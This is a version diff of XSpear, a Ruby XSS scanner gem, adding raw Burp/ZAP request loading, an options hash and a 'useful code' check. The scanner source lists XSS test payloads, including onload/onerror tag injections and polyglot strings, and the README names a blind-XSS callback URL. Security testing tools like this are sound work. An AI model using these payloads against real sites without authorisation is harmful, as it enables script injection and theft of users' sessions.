XSpear 1.0.8 → 1.0.9

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 6921327dc742a1fe07a1daf76f20272a50f5fc6d8ecd73bf4f2ef9eed6d0d98d
-  data.tar.gz: 3344443259fa53fe61fc57baefed0f81891e8badd048c9098c4c69a8b33ea1fe
+  metadata.gz: 7af449d36fa665bdbba42ab63dd4ecbc9b666dbeb29751df167cf3c28662d6d7
+  data.tar.gz: fe079028ed5fe02664db09b5bcbfd15f2ea68661d2c6a146853872cbf8e978fd
 SHA512:
-  metadata.gz: da21a77b8132168cf8068f7cde102b4dac72d332db5a62f75fff701d258ef3e636fdcabfaabee1ecc159f5b7fb5223b86016ce59264fdee6a104b1f6725d01da
-  data.tar.gz: c1bcef3a187eef64530b717527316f6f674387de7eda895fa6420c6e3de5d0eff103ac9ef359162cc89c9d91a77f12af6c8d7ad47e857b5632794ce8eeb50f53
+  metadata.gz: 73b1cc7d0727310e9515f3b2602f3ab1b004f15bf85e316d63bc3c58a36840a03fc1a8481ea327aa0165851a01b1b294d9709029f2525c45bcf4c3b4215d90f1
+  data.tar.gz: 3ab96ff93a503b4c94dd6f0427b963d1b3a81307aa4d7b8a2251a8e0693af848f49bda80174a21903e26e2ed700a7f45cb014cc09cea77d53de9a9f96e56be8b

data/.idea/workspace.xml

@@ -2,7 +2,8 @@
 <project version="4">
   <component name="ChangeListManager">
     <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
-      <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
+      <change beforePath="$PROJECT_DIR$/README.md" beforeDir="false" afterPath="$PROJECT_DIR$/README.md" afterDir="false" />
+      <change beforePath="$PROJECT_DIR$/exe/XSpear" beforeDir="false" afterPath="$PROJECT_DIR$/exe/XSpear" afterDir="false" />
       <change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
     </list>
     <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
@@ -17,11 +18,20 @@
   <component name="FileEditorManager">
     <leaf SIDE_TABS_SIZE_LIMIT_KEY="300">
       <file pinned="false" current-in-tab="false">
+        <entry file="file://$PROJECT_DIR$/exe/XSpear">
+          <provider selected="true" editor-type-id="text-editor">
+            <state relative-caret-position="458">
+              <caret line="38" column="77" selection-start-line="38" selection-start-column="77" selection-end-line="38" selection-end-column="77" />
+            </state>
+          </provider>
+        </entry>
+      </file>
+      <file pinned="false" current-in-tab="true">
         <entry file="file://$PROJECT_DIR$/README.md">
           <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
             <state split_layout="SPLIT">
-              <first_editor relative-caret-position="2113">
-                <caret line="299" column="110" selection-start-line="299" selection-start-column="110" selection-end-line="299" selection-end-column="110" />
+              <first_editor relative-caret-position="274">
+                <caret line="220" column="10" selection-start-line="220" selection-start-column="10" selection-end-line="220" selection-end-column="10" />
               </first_editor>
               <second_editor />
             </state>
@@ -33,11 +43,11 @@
           <provider selected="true" editor-type-id="text-editor" />
         </entry>
       </file>
-      <file pinned="false" current-in-tab="true">
+      <file pinned="false" current-in-tab="false">
         <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
           <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="381">
-              <caret line="402" lean-forward="true" selection-start-line="402" selection-end-line="402" />
+            <state relative-caret-position="-1602">
+              <caret line="421" column="235" selection-start-line="421" selection-start-column="235" selection-end-line="421" selection-end-column="235" />
             </state>
           </provider>
         </entry>
@@ -45,17 +55,8 @@
       <file pinned="false" current-in-tab="false">
         <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
           <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="-176">
-              <caret line="34" column="99" selection-start-line="34" selection-start-column="99" selection-end-line="34" selection-end-column="99" />
-            </state>
-          </provider>
-        </entry>
-      </file>
-      <file pinned="false" current-in-tab="false">
-        <entry file="file://$PROJECT_DIR$/lib/XSpear/banner.rb">
-          <provider selected="true" editor-type-id="text-editor">
-            <state relative-caret-position="180">
-              <caret line="12" column="69" selection-start-line="12" selection-start-column="69" selection-end-line="12" selection-end-column="69" />
+            <state relative-caret-position="1590">
+              <caret line="106" column="9" lean-forward="true" selection-start-line="106" selection-start-column="9" selection-end-line="106" selection-end-column="9" />
             </state>
           </provider>
         </entry>
@@ -108,19 +109,19 @@
         <option value="$PROJECT_DIR$/lib/XSpear/log.rb" />
         <option value="$PROJECT_DIR$/XSpear.gemspec" />
         <option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
-        <option value="$PROJECT_DIR$/exe/XSpear" />
-        <option value="$PROJECT_DIR$/README.md" />
         <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
         <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
         <option value="$PROJECT_DIR$/lib/XSpear.rb" />
+        <option value="$PROJECT_DIR$/exe/XSpear" />
+        <option value="$PROJECT_DIR$/README.md" />
       </list>
     </option>
   </component>
   <component name="ProjectFrameBounds" fullScreen="true">
     <option name="x" value="-1920" />
-    <option name="y" value="-620" />
+    <option name="y" value="-643" />
     <option name="width" value="1920" />
-    <option name="height" value="1057" />
+    <option name="height" value="1080" />
   </component>
   <component name="ProjectLevelVcsManager" settingsEditedManually="true">
     <ConfirmationsSetting value="2" id="Add" />
@@ -227,7 +228,7 @@
       <workItem from="1562942816004" duration="15337000" />
       <workItem from="1563638656518" duration="4985000" />
       <workItem from="1563809961097" duration="4237000" />
-      <workItem from="1563893538891" duration="6879000" />
+      <workItem from="1563893538891" duration="11528000" />
     </task>
     <task id="LOCAL-00001" summary="init update">
       <created>1562945899597</created>
@@ -502,17 +503,59 @@
       <option name="project" value="LOCAL" />
       <updated>1563897379180</updated>
     </task>
-    <option name="localTasksCounter" value="40" />
+    <task id="LOCAL-00040" summary="(1.0.8) Add event handler &amp; html5 XSS code, new pattern">
+      <created>1563990681736</created>
+      <option name="number" value="00040" />
+      <option name="presentableId" value="LOCAL-00040" />
+      <option name="project" value="LOCAL" />
+      <updated>1563990681736</updated>
+    </task>
+    <task id="LOCAL-00041" summary="(1.0.8) Releases 1.0.8">
+      <created>1563990736550</created>
+      <option name="number" value="00041" />
+      <option name="presentableId" value="LOCAL-00041" />
+      <option name="project" value="LOCAL" />
+      <updated>1563990736550</updated>
+    </task>
+    <task id="LOCAL-00042" summary="(1.0.9)[Fixed #11] Add check 'useful code'">
+      <created>1564062644030</created>
+      <option name="number" value="00042" />
+      <option name="presentableId" value="LOCAL-00042" />
+      <option name="project" value="LOCAL" />
+      <updated>1564062644030</updated>
+    </task>
+    <task id="LOCAL-00043" summary="(1.0.9)[Fixed #12] Modify XSpear Struct(option.* =&gt; options [hash])">
+      <created>1564062846754</created>
+      <option name="number" value="00043" />
+      <option name="presentableId" value="LOCAL-00043" />
+      <option name="project" value="LOCAL" />
+      <updated>1564062846754</updated>
+    </task>
+    <task id="LOCAL-00044" summary="(1.0.9)[Fixed #10] Add raw file read options">
+      <created>1564065374518</created>
+      <option name="number" value="00044" />
+      <option name="presentableId" value="LOCAL-00044" />
+      <option name="project" value="LOCAL" />
+      <updated>1564065374518</updated>
+    </task>
+    <task id="LOCAL-00045" summary="(1.0.9)[Fixed #13] Remove add pattern from StandardError in 'makeQueryPattern'">
+      <created>1564065895283</created>
+      <option name="number" value="00045" />
+      <option name="presentableId" value="LOCAL-00045" />
+      <option name="project" value="LOCAL" />
+      <updated>1564065895283</updated>
+    </task>
+    <option name="localTasksCounter" value="46" />
     <servers />
   </component>
   <component name="TimeTrackingManager">
-    <option name="totallyTimeSpent" value="31438000" />
+    <option name="totallyTimeSpent" value="36087000" />
   </component>
   <component name="ToolWindowManager">
     <frame x="-1920" y="-643" width="1920" height="1080" extended-state="0" />
     <editor active="true" />
     <layout>
-      <window_info content_ui="combo" id="Project" order="0" visible="true" weight="0.16400427" />
+      <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.16400427" />
       <window_info id="Structure" order="1" side_tool="true" weight="0.25" />
       <window_info id="Favorites" order="2" side_tool="true" />
       <window_info anchor="bottom" id="Message" order="0" />
@@ -525,7 +568,7 @@
       <window_info anchor="bottom" id="Docker" order="7" show_stripe_button="false" />
       <window_info anchor="bottom" id="Database Changes" order="8" />
       <window_info anchor="bottom" id="Version Control" order="9" />
-      <window_info active="true" anchor="bottom" id="Terminal" order="10" visible="true" weight="0.34158415" />
+      <window_info anchor="bottom" id="Terminal" order="10" visible="true" weight="0.34158415" />
       <window_info anchor="bottom" id="Event Log" order="11" side_tool="true" />
       <window_info anchor="bottom" id="Messages" order="12" weight="0.32953367" />
       <window_info anchor="right" id="Commander" internal_type="SLIDING" order="0" type="SLIDING" weight="0.4" />
@@ -538,12 +581,6 @@
     <option name="version" value="1" />
   </component>
   <component name="VcsManagerConfiguration">
-    <MESSAGE value="Add json report and new build binary, edit readme" />
-    <MESSAGE value="Add screenshot images" />
-    <MESSAGE value="Add dependency gems descriptions" />
-    <MESSAGE value="Add cli banner" />
-    <MESSAGE value="Edit Selenium code &amp; README, Change version" />
-    <MESSAGE value="1.0.0 Final commit" />
     <MESSAGE value="Edit readme" />
     <MESSAGE value="modify dependency rspec" />
     <MESSAGE value="Change Badge(version)" />
@@ -563,7 +600,13 @@
     <MESSAGE value="(1.0.6) Releases 1.0.6 version" />
     <MESSAGE value="(1.0.6) Edit README.md" />
     <MESSAGE value="(1.0.7) Releases 1.0.7 (Modify Format, etc..)" />
-    <option name="LAST_COMMIT_MESSAGE" value="(1.0.7) Releases 1.0.7 (Modify Format, etc..)" />
+    <MESSAGE value="(1.0.8) Add event handler &amp; html5 XSS code, new pattern" />
+    <MESSAGE value="(1.0.8) Releases 1.0.8" />
+    <MESSAGE value="(1.0.9)[Fixed #11] Add check 'useful code'" />
+    <MESSAGE value="(1.0.9)[Fixed #12] Modify XSpear Struct(option.* =&gt; options [hash])" />
+    <MESSAGE value="(1.0.9)[Fixed #10] Add raw file read options" />
+    <MESSAGE value="(1.0.9)[Fixed #13] Remove add pattern from StandardError in 'makeQueryPattern'" />
+    <option name="LAST_COMMIT_MESSAGE" value="(1.0.9)[Fixed #13] Remove add pattern from StandardError in 'makeQueryPattern'" />
   </component>
   <component name="editorHistoryManager">
     <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -579,13 +622,6 @@
     <entry file="file://$PROJECT_DIR$/bin/setup">
       <provider selected="true" editor-type-id="text-editor" />
     </entry>
-    <entry file="file://$PROJECT_DIR$/exe/XSpear">
-      <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="525">
-          <caret line="35" column="117" selection-start-line="35" selection-start-column="117" selection-end-line="35" selection-end-column="117" />
-        </state>
-      </provider>
-    </entry>
     <entry file="file://$PROJECT_DIR$/lib/XSpear/banner.rb">
       <provider selected="true" editor-type-id="text-editor">
         <state relative-caret-position="180">
@@ -593,13 +629,6 @@
         </state>
       </provider>
     </entry>
-    <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
-      <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="195">
-          <caret line="13" column="19" selection-start-line="13" selection-start-column="19" selection-end-line="13" selection-end-column="19" />
-        </state>
-      </provider>
-    </entry>
     <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
       <provider selected="true" editor-type-id="text-editor">
         <state relative-caret-position="105">
@@ -616,16 +645,6 @@
     <entry file="file://$PROJECT_DIR$/spec/XSpear_spec.rb">
       <provider selected="true" editor-type-id="text-editor" />
     </entry>
-    <entry file="file://$PROJECT_DIR$/README.md">
-      <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
-        <state split_layout="SPLIT">
-          <first_editor relative-caret-position="2113">
-            <caret line="299" column="110" selection-start-line="299" selection-start-column="110" selection-end-line="299" selection-end-column="110" />
-          </first_editor>
-          <second_editor />
-        </state>
-      </provider>
-    </entry>
     <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
       <provider selected="true" editor-type-id="text-editor">
         <state relative-caret-position="15">
@@ -633,17 +652,41 @@
         </state>
       </provider>
     </entry>
+    <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
+      <provider selected="true" editor-type-id="text-editor">
+        <state relative-caret-position="195">
+          <caret line="13" column="19" selection-start-line="13" selection-start-column="19" selection-end-line="13" selection-end-column="19" />
+        </state>
+      </provider>
+    </entry>
     <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
       <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="-176">
-          <caret line="34" column="99" selection-start-line="34" selection-start-column="99" selection-end-line="34" selection-end-column="99" />
+        <state relative-caret-position="1590">
+          <caret line="106" column="9" lean-forward="true" selection-start-line="106" selection-start-column="9" selection-end-line="106" selection-end-column="9" />
+        </state>
+      </provider>
+    </entry>
+    <entry file="file://$PROJECT_DIR$/exe/XSpear">
+      <provider selected="true" editor-type-id="text-editor">
+        <state relative-caret-position="458">
+          <caret line="38" column="77" selection-start-line="38" selection-start-column="77" selection-end-line="38" selection-end-column="77" />
         </state>
       </provider>
     </entry>
     <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
       <provider selected="true" editor-type-id="text-editor">
-        <state relative-caret-position="381">
-          <caret line="402" lean-forward="true" selection-start-line="402" selection-end-line="402" />
+        <state relative-caret-position="-1602">
+          <caret line="421" column="235" selection-start-line="421" selection-start-column="235" selection-end-line="421" selection-end-column="235" />
+        </state>
+      </provider>
+    </entry>
+    <entry file="file://$PROJECT_DIR$/README.md">
+      <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
+        <state split_layout="SPLIT">
+          <first_editor relative-caret-position="274">
+            <caret line="220" column="10" selection-start-line="220" selection-start-column="10" selection-end-line="220" selection-end-column="10" />
+          </first_editor>
+          <second_editor />
         </state>
       </provider>
     </entry>

data/README.md

@@ -14,6 +14,7 @@ XSpear is XSS Scanner on ruby gems
   + Find SQL Error pattern
   + Analysis Security headers(`CSP` `HSTS` `X-frame-options`, `XSS-protection` etc.. )
   + Analysis Other headers..(Server version, Content-Type, etc...)
+- Scanning from Raw file(Burp suite, ZAP Request)
 - XSpear running on ruby code(with Gem library)
 - Show `table base cli-report` and `filtered rule`, `testing raw query`(url)
 - Testing at selected parameters
@@ -64,6 +65,7 @@ $ ruby a.rb -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'
     -d, --data=POST Body             [optional] POST Method Body data
         --headers=HEADERS            [optional] Add HTTP Headers
         --cookie=COOKIE              [optional] Add Cookie
+        --raw=FILENAME               [optional] Load raw file(e.g raw_sample.txt)
     -p, --param=PARAM                [optional] Test paramters
     -b, --BLIND=URL                  [optional] Add vector of Blind XSS
                                       + with XSS Hunter, ezXSS, HBXSS, etc...
@@ -78,6 +80,7 @@ $ ruby a.rb -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'
     -h, --help                       Prints this help
         --version                    Show XSpear version
         --update                     Update with online
+
 ```
 ### Result types
 - (I)NFO: Get information ( e.g sql error , filterd rule, reflected params, etc..)
@@ -180,9 +183,10 @@ __((_)(_))  /(/(   /((_))(_))(()\
 +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+
 < Available Objects >
 [cat] param
- + Available Special Char: ' \ ` ] . : ) } [ { $
- + Available Event Handler: "onActivate","onBeforeCopy","onAfterPrint","onAfterUpdate","onAbort","onBeforeActivate","onBeforeDeactivate","onBlur","onBeforeCut","onBounce","onBeforeUnload","onBeforeEditFocus","onBeforePaste","onBeforeUpdate","onBegin","onBeforePrint","onClick","onChange","onControlSelect","onDataSetChanged","onCopy","onDataSetComplete","onContextMenu","onDataAvailable","onCellChange","onCut","onDeactivate","onDblClick","onDragEnd","onDragOver","onDragDrop","onDrop","onDragStart","onDrag","onDragEnter","onDragLeave","onFilterChange","onFocusIn","onEnd","onHelp","onError","onErrorUpdate","onFocus","onFinish","onHashChange","onFocusOut","onLoad","onLoseCapture","onInput","onLayoutComplete","onKeyDown","onMessage","onKeyUp","onMediaError","onMediaComplete","onKeyPress","onMouseOver","onMove","onMouseEnter","onMouseWheel","onMouseLeave","onMoveEnd","onMouseDown","onMouseMove","onMouseUp","onMouseOut","onPropertyChange","onMoveStart","onPaste","onPopState","onOutOfSync","onProgress","onOnline","onReadyStateChange","onOffline","onPause","onResize","onReverse","onRepeat","onRedo","onResizeEnd","onRowExit","onReset","onRowsEnter","onResizeStart","onResume","onRowInserted","onScroll","onStorage","onSelectStart","onRowDelete","onSeek","onSelectionChange","onSelect","onStart","onStop","onUndo","onTrackChange","onURLFlip","onTimeError","onSyncRestored","onSubmit","onUnload"
- + Available HTML Tag: "svg","iframe","script","audio","video","meta","frame","img","embeded","frameset","object","style"
+ + Available Special Char: ' \ ` ) [ } : . { ] $
+ + Available Event Handler: "onActivate","onBeforeActivate","onAfterUpdate","onAbort","onAfterPrint","onBeforeCopy","onBeforeCut","onBeforePaste","onBlur","onBeforePrint","onBeforeDeactivate","onBeforeUpdate","onBeforeEditFocus","onBegin","onBeforeUnload","onBounce","onDataSetChanged","onCellChange","onClick","onDataAvailable","onChange","onContextMenu","onCopy","onControlSelect","onDataSetComplete","onCut","onDragStart","onDragEnter","onDragOver","onDblClick","onDragEnd","onDrop","onDeactivate","onDragLeave","onDrag","onDragDrop","onHashChange","onFocusOut","onFilterChange","onEnd","onFocus","onHelp","onErrorUpdate","onFocusIn","onFinish","onError","onLayoutComplete","onKeyDown","onKeyUp","onMediaError","onLoad","onMediaComplete","onInput","onKeyPress","onloadstart","onLoseCapture","onMouseOut","onMouseDown","onMouseWheel","onMove","onMouseLeave","onMessage","onMouseEnter","onMouseMove","onMouseOver","onMouseUp","onPropertyChange","onMoveStart","onProgress","onPopState","onPaste","onOnline","onMoveEnd","onPause","onOutOfSync","onOffline","onReverse","onResize","onRedo","onRowsEnter","onRepeat","onReset","onResizeEnd","onResizeStart","onReadyStateChange","onResume","onRowInserted","onStart","onScroll","onRowExit","onSelectionChange","onSeek","onStop","onRowDelete","onSelectStart","onSelect","ontouchstart","ontouchend","onTrackChange","onSyncRestored","onTimeError","onUndo","onURLFlip","onStorage","onUnload","onSubmit","ontouchmove"
+ + Available HTML Tag: "meta","video","iframe","embed","script","audio","svg","object","img","frameset","applet","style","frame"
+ + Available Useful Code: "document.cookie","document.location","window.location"
 < Raw Query >
 [0] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zXsPeaR%22
 [1] http://testphp.vulnweb.com/listproducts.php?cat=z?-
@@ -208,9 +212,19 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
 ```ruby
 require 'XSPear'
 
-s = XspearScan.new "https://www.hahwul.com?target_url", "post_body=thisisbodydata", "CustomHeader: wow", 3, 10, "result.json", "3", "blind-xss-url"
-# s = XspearScan.new options.url, options.data, options.headers, options.level, options.thread.to_i, options.output, options.verbose, options.blind
-s.run
+# Set options
+options = {}
+options['thread'] = 30
+options['cookie'] = "data=123"
+options['blind'] = "https://hahwul.xss.ht"
+options['output'] = json
+
+# Create XSpear object with url, options
+s = XspearScan.new "https://www.hahwul.com?target_url", options
+
+# Scanning
+result = s.run
+r = JSON.parse result
 ```
 
 ## Add Scanning Module

data/exe/XSpear

@@ -1,10 +1,12 @@
 #!/usr/bin/env ruby
 
+
 require "XSpear"
-Options = Struct.new(:url, :data, :headers, :params, :thread, :verbose, :output, :blind)
+Options = Struct.new(:url, :data, :headers, :params, :options )
 class Parser
   def self.parse(options)
     args = Options.new('xspear')
+    args.options = {}
     if options.empty?
       banner
       puts 'please ' + "'-h'".yellow + ' option'
@@ -13,46 +15,61 @@ class Parser
     opt_parser = OptionParser.new do |opts|
       opts.banner = "Usage: xspear -u [target] -[options] [value]\n[ e.g ]\n$ ruby a.rb -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'\n\n[ Options ]"
 
+
       opts.on('-u', '--url=target_URL', '[required] Target Url') do |n|
         args.url = n
       end
 
+
       opts.on('-d', '--data=POST Body', '[optional] POST Method Body data') do |n|
-        args.data = n
+        args.options['data'] = n
       end
 
+
       opts.on('--headers=HEADERS', '[optional] Add HTTP Headers') do |n|
-        args.headers = n
+        args.options['headers'] = n
       end
 
+
       opts.on('--cookie=COOKIE', '[optional] Add Cookie') do |n|
-        args.headers = 'Cookie: ' + n
+        args.options['cookie'] = 'Cookie: ' + n
+      end
+
+
+      opts.on('--raw=FILENAME', '[optional] Load raw file(e.g raw_sample.txt)') do |n|
+        args.options['raw'] = n
       end
 
+
       opts.on('-p', '--param=PARAM', '[optional] Test paramters') do |n|
-        args.params = n
+        args.options['params'] = n
       end
 
+
       opts.on('-b', '--BLIND=URL', '[optional] Add vector of Blind XSS',' + with XSS Hunter, ezXSS, HBXSS, etc...',' + e.g : -b https://hahwul.xss.ht') do |n|
-        args.blind = n
+        args.options['blind'] = n
       end
 
+
       opts.on('-t', '--threads=NUMBER', '[optional] thread , default: 10') do |n|
-        args.thread = n
+        args.options['thread'] = n
       end
 
+
       opts.on('-o', '--output=FILENAME', '[optional] Save JSON Result') do |n|
-        args.output = n
+        args.options['output'] = n
       end
 
+
       opts.on('-v', '--verbose=1~3', '[optional] Show log depth',
               ' + Default value: 2',
               ' + v=1 : quite mode',
               ' + v=2 : show scanning log',
               ' + v=3 : show detail log(req/res)') do |n|
-        args.verbose = n
+        args.options['verbose'] = n
       end
 
+
       opts.on('-h', '--help', 'Prints this help') do
         banner
         puts opts
@@ -75,12 +92,67 @@ class Parser
 end
 options = Parser.parse ARGV
 
+if !options.options['raw'].nil?
+  begin
+    method = ""
+    path = ""
+    headers_hash = {}
+    headers = ""
+    data = ""
+    switch = true
+    file = File.open options.options['raw']
+    r = file.read
+    file.close
+    r.each_line do |line|
+      if switch
+        temp = line.split(" ")
+        method = temp[0]
+        path = temp[1]
+        switch = false
+      else
+        if line.include? ": "
+          temp = line.split(": ")
+          hn = temp[0]
+          hd = line.sub(hn+": ", "")
+          headers_hash[hn] = hd
+          headers = headers + "#{hn}: #{hd}\n"
+        elsif line.size > 2
+          # data
+          data = line
+        else
+          # blank
+        end
+      end
+    end
+
+    # Burp or ZAP
+    # http, https로 시작하면 zap 아니면 burp 포맷
+    url = ""
+    if (path.index('http://') == 0 || path.index('https://') == 0)
+      url = path
+    else
+      url = "http://"+headers_hash['Host'].to_s.chomp!+"/"+path
+    end
+    options.url = url
+    if headers.length > 0
+      options.options['headers'] = headers
+    end
+    if method == "POST" && data.size
+      options.options['data'] = data
+    end
+  rescue => e
+    puts "RAW file Error #{e}"
+    exit
+  end
+end
+
 exit unless options.url
-options.thread = 10 unless options.thread
-options.verbose = 2 unless options.verbose
+options.options['thread'] = 10 unless options.options['thread']
+options.options['verbose'] = 2 unless options.options['verbose']
+options.options['thread'] = options.options['thread'].to_i
 
-if options.verbose.to_i != 1
+if options.options['verbose'].to_i != 1
   banner
 end
-s = XspearScan.new options.url, options.data, options.headers, options.params, options.thread.to_i, options.output, options.verbose, options.blind
+s = XspearScan.new options.url, options.options
 s.run

data/lib/XSpear/XSpearRepoter.rb

@@ -87,6 +87,7 @@ class XspearRepoter
       eh = []
       tag = []
       sc = []
+      uc = []
       puts "[#{key}]".blue+" param"
       value.each do |n|
         if n.include? "=64"
@@ -96,6 +97,9 @@ class XspearRepoter
           # tag
           n = n.sub("xsp<","")
           tag.push n.chomp(">")
+        elsif n.include? ".xspear"
+          # uc
+          uc.push n.sub(".xspear","")
         else
           # sc
           sc.push n.sub("XsPeaR","")
@@ -104,6 +108,7 @@ class XspearRepoter
       puts " + Available Special Char: ".green+"#{sc.map(&:inspect).join(',').gsub('"',"")}".gsub(',',' ')
       puts " + Available Event Handler: ".green+"#{eh.map(&:inspect).join(',')}"
       puts " + Available HTML Tag: ".green+"#{tag.map(&:inspect).join(',')}"
+      puts " + Available Useful Code: ".green+"#{uc.map(&:inspect).join(',')}"
     end
     puts "< Raw Query >".yellow
     @query.each_with_index do |q, i|

data/lib/XSpear/version.rb

@@ -1,3 +1,3 @@
 module XSpear
-  VERSION = "1.0.8"
+  VERSION = "1.0.9"
 end

data/lib/XSpear.rb

@@ -13,19 +13,19 @@ module XSpear
 end
 
 class XspearScan
-  def initialize(url, data, headers, params, thread, output, verbose, blind)
+  def initialize(url, options)
     @url = url
-    @data = data
-    @headers = headers
-    if params.nil?
-      @params = params
+    @data = options['data']
+    @headers = options['headers']
+    if options['params'].nil?
+      @params = options['params']
     else
-      @params = params.split(",")
+      @params = options['params'].split(",")
     end
-    @thread = thread
-    @output = output
-    @verbose = verbose
-    @blind_url = blind
+    @thread = options['thread']
+    @output = options['output']
+    @verbose = options['verbose']
+    @blind_url = options['blind']
     @report = XspearRepoter.new @url, Time.now, (@data.nil? ? "GET" : "POST")
     @filtered_objects = {}
   end
@@ -379,6 +379,11 @@ class XspearScan
       r.push makeQueryPattern('f', "\">xsp<#{tag}>", "xsp<#{tag}>", 'i', "not filtered "+"<#{tag}>".blue, CallbackNotAdded)
     end
 
+    # Check useful code
+    useful_code.each do |c|
+      r.push makeQueryPattern('f', "#{c}.xspear", "#{c}.xspear", 'i', "not filtered "+"'#{c}' code".blue, CallbackNotAdded)
+    end
+
     # Check Common XSS Payloads
     onfocus_tags = [
         "input",
@@ -401,20 +406,20 @@ class XspearScan
       r.push makeQueryPattern('x', "\"'><#{t} autofocus onfocus=alert(45)>", "<#{t} autofocus onfocus=alert(45)>", 'h', "reflected "+"onfocus XSS Code".red, CallbackStringMatch)
     end
 
-    # Check Selenium Payloads
-    r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered "+"<script>alert(45)</script>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"><svgonload=alert(1)>', '<svgonload=alert(1)>', 'v', "triggered "+"<svgonload=alert(1)>  (x0c)".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered "+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "triggered "+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert(45)">', '<details/open/ontoggle="alert(45)">', 'h', "triggered "+"<details/open/ontoggle=\"alert(45)\">".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "triggered "+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "triggered "+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)
+    # Check Selenium Common XSS Payloads
+    r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered ".yellow+"<script>alert(45)</script>".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', '"><svgonload=alert(45)>', '<svg(0x0c)onload=alert(1)>', 'v', "triggered ".yellow+"<svg(0x0c)onload=alert(1)>".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered ".yellow+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "triggered ".yellow+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert(45)">', '<details/open/ontoggle="alert(45)">', 'h', "triggered ".yellow+"<details/open/ontoggle=\"alert(45)\">".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "triggered ".yellow+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
+    r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "triggered ".yellow+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)
 
-    # Check Selenium Polyglot
-    r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//-->&lt;<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered "+"XSS Polyglot payload".red, CallbackXSSSelenium)
